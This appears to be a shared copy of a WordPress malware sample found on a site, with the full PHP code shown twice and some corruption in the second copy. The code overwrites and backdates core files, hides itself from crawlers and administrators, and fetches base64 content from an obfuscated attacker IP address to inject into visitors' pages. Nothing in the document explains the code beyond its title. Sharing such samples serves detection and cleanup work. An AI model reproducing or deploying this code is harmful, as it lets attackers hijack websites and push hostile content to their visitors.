artlung/found-malicious-code.php

## found-malicious-code.php
<?php //istart

function my_time($dir) {
    foreach (glob($dir . '/wp-*.php') as $f) {
        $times[] = filemtime($f);
    }
    $max = 1;
    for ($i = 0; $i < count($times) - 1; $i++) {
        $k = 1;
        for ($j = $i + 1; $j < count($times); $j++) {
            if ($times[$i] == $times[$j]) {
                $k++;
                if ($k > $max) {
                    $max = $k;
                    $time = $times[$i];
                }
            }
        }
    }
    return $time;
}

function my_correct($dir) {
    $time = 0;
    $path = $dir . '/index.php';
    $content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
    if (file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        $time = my_time($dir);
        touch($path, $time);
    }

    $path = $dir . '/.htaccess';
    $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
    if (file_exists($path) AND file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        if (!$time) {
            $time = my_time($dir);
        }
        touch($path, $time);
    }
}

my_correct(dirname(__FILE__) . '/..');

function request_url_data($url) {
    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

error_reporting(0);
$_passssword = '537b8131b7b239ba6d9e455ac8e12d06';
unset($_passssword);

if (function_exists("add_action")) {
    add_action('wp_head', 'add_2head');
    add_action('wp_footer', 'add_2footer');
}

function add_2head() {
    ob_start();
}

function add_2footer() {
    $check = false;
    $check_data = "";
    if (!empty($_GET['check']) AND $_GET['check'] == '537b8131b7b239ba6d9e455ac8e12d06') {
        $check = true;
        $check_data = ('<!--checker_start ');
        $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
        $check_data .= (' checker_end-->');
    }

    if (!$check) {
        if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
            return;

        $cookie_name = 'PHP_SESSION_PHP';
        if (isset($_COOKIE[$cookie_name]))
            return;

        foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
            if (preg_match($regex, $_SERVER['REQUEST_URI']))
                return;
        }
    }

    $buffer = ob_get_clean();
    ob_start();
    $regexp = '/<body[^>]*>/is';
    if (preg_match($regexp, $buffer, $m)) {
        $body = $m[0];
        $url = base64_decode('aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MzkzNTo2ODM1OTU6ODEz');
//        if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
        if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
            $body .=  '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
//            $body .= base64_decode($m[0]);
            $body .= $decoded;
//            $body .= base64_decode($m[0]);
        }
        $body .= $check_data;

        $buffer = preg_replace($regexp, $body, $buffer);
    }
    echo $buffer;
    ob_flush();
}//iend
	<?php //istart

	function my_time($dir) {
	foreach (glob($dir . '/wp-*.php') as $f) {
	$times[] = filemtime($f);
	}
	$max = 1;
	for ($i = 0; $i < count($times) - 1; $i++) {
	$k = 1;
	for ($j = $i + 1; $j < count($times); $j++) {
	if ($times[$i] == $times[$j]) {
	$k++;
	if ($k > $max) {
	$max = $k;
	$time = $times[$i];
	}
	}
	}
	}
	return $time;
	}

	function my_correct($dir) {
	$time = 0;
	$path = $dir . '/index.php';
	$content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
	if (file_get_contents($path) != $content) {
	chmod($path, 0644);
	file_put_contents($path, $content);
	chmod($path, 0444);
	$time = my_time($dir);
	touch($path, $time);
	}

	$path = $dir . '/.htaccess';
	$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
	if (file_exists($path) AND file_get_contents($path) != $content) {
	chmod($path, 0644);
	file_put_contents($path, $content);
	chmod($path, 0444);
	if (!$time) {
	$time = my_time($dir);
	}
	touch($path, $time);
	}
	}

	my_correct(dirname(__FILE__) . '/..');

	function request_url_data($url) {
	$site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
	if (function_exists('curl_init')) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_TIMEOUT, 5);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HTTPHEADER, array(
	'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
	'Referer: ' . $site_url,
	));
	$response = trim(curl_exec($ch));
	} elseif (function_exists('fsockopen')) {
	$m = parse_url($url);
	if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
	fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
	'Host: ' . $m['host'] . "\r\n" .
	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
	'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
	'Referer: ' . $site_url . "\r\n" .
	'Connection: Close' . "\r\n\r\n");
	$response = '';
	while (!feof($fp)) {
	$response .= fgets($fp, 1024);
	}
	list($headers, $response) = explode("\r\n\r\n", $response);
	fclose($fp);
	}
	} else {
	$response = 'curl_init and fsockopen disabled';
	}
	return $response;
	}

	error_reporting(0);
	$_passssword = '537b8131b7b239ba6d9e455ac8e12d06';
	unset($_passssword);

	if (function_exists("add_action")) {
	add_action('wp_head', 'add_2head');
	add_action('wp_footer', 'add_2footer');
	}

	function add_2head() {
	ob_start();
	}

	function add_2footer() {
	$check = false;
	$check_data = "";
	if (!empty($_GET['check']) AND $_GET['check'] == '537b8131b7b239ba6d9e455ac8e12d06') {
	$check = true;
	$check_data = ('<!--checker_start ');
	$check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
	$check_data .= (' checker_end-->');
	}

	if (!$check) {
	if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot\|msnbot\|yahoo\|search\|bing\|ask\|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
	return;

	$cookie_name = 'PHP_SESSION_PHP';
	if (isset($_COOKIE[$cookie_name]))
	return;

	foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
	if (preg_match($regex, $_SERVER['REQUEST_URI']))
	return;
	}
	}

	$buffer = ob_get_clean();
	ob_start();
	$regexp = '/<body[^>]*>/is';
	if (preg_match($regexp, $buffer, $m)) {
	$body = $m[0];
	$url = base64_decode('aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MzkzNTo2ODM1OTU6ODEz');
	// if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
	if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
	$body .= '<script>var date = new Date(new Date().getTime() + 60602471000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
	// $body .= base64_decode($m[0]);
	$body .= $decoded;
	// $body .= base64_decode($m[0]);
	}
	$body .= $check_data;

	$buffer = preg_replace($regexp, $body, $buffer);
	}
	echo $buffer;
	ob_flush();
	}//iend